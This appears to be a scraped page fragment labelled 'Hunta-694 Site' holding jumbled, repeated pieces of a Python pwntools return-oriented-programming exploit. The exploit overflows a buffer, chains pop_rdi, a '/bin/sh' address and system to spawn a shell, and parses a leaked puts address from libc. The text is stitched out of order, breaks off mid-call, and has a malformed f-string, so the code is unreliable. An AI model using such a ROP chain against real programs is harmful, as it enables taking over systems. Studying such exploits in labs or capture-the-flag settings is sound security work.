Hunta-694 Site
rop_payload = flat( b'A' * offset, pop_rdi, bin_sh, system ) io.sendlineafter(b'> ', rop_payload)
# Receive and parse leak leaked_puts = u64(io.recvline().strip().ljust(8, b'\x00')) log.success(f'Leaked puts@GLIBC: hex(leaked_puts)') hunta-694
# ---------------------------------------------------------------------- # Exploit # ---------------------------------------------------------------------- def main(): io = start() rop_payload = flat( b'A' * offset, pop_rdi, bin_sh,